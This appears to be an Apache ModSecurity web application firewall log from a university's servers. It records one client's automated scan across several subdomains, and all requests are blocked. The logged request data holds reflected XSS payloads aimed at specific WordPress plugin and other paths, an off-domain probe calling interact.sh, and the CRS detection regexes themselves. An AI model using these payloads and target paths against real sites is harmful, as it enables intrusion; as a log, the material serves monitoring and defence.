[Tue Aug 29 11:54:20.824434 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAor7uEAAAAk"]
[Tue Aug 29 11:54:20.924269 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAoUJjIAAAAB"]
[Tue Aug 29 11:54:20.940271 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAoGFlMAAAAE"]
[Tue Aug 29 11:54:20.948373 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAAolKhIAAAAe"]
[Tue Aug 29 11:54:20.948563 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAoUJjMAAAAB"]
[Tue Aug 29 11:54:20.949410 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-MCo-f0AAAor7uMAAAAk"]
[Tue Aug 29 11:54:20.970186 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-MCo-f0AAApjIMYAAAAm"]
[Tue Aug 29 11:54:21.013517 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-cCo-f0AAApa-DwAAAAg"]
[Tue Aug 29 11:54:21.015057 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-cCo-f0AAApjIMcAAAAm"]
[Tue Aug 29 11:54:21.552898 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAoAk74AAAAC"]
[Tue Aug 29 11:54:21.555003 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAoGFlkAAAAE"]
[Tue Aug 29 11:54:21.555747 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAoUJjUAAAAB"]
[Tue Aug 29 11:54:21.578928 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAor7uoAAAAk"]
[Tue Aug 29 11:54:21.579227 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAolKhkAAAAe"]
[Tue Aug 29 11:54:21.603067 2023] [:error] [pid 2648] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:first. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:first: HOVER ME!</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/address_add/add.php"] [unique_id "ZO15-cCo-f0AAApYpoQAAAAa"]
[Tue Aug 29 11:54:21.656877 2023] [:error] [pid 2676] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:background. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:background: \\x22><script>alert(document.domain)</script><img src=\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/squid.svg"] [unique_id "ZO15-cCo-f0AAAp0OEAAAAAI"]
[Tue Aug 29 11:54:22.617308 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wpbase: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-sCo-f0AAApbUTMAAAAh"]
[Tue Aug 29 11:54:22.871121 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApl9@IAAAAo"]
[Tue Aug 29 11:54:22.895032 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApmXuAAAAAp"]
[Tue Aug 29 11:54:22.897600 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAAph8vEAAAAj"]
[Tue Aug 29 11:54:22.904305 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApk-U8AAAAn"]
[Tue Aug 29 11:54:23.012820 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-8Co-f0AAApmXuEAAAAp"]
[Tue Aug 29 11:54:23.552302 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApV210AAAAJ"]
[Tue Aug 29 11:54:23.554307 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAAoGFlwAAAAE"]
[Tue Aug 29 11:54:23.555010 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAAnHQxQAAAAT"]
[Tue Aug 29 11:54:23.573323 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApl9@UAAAAo"]
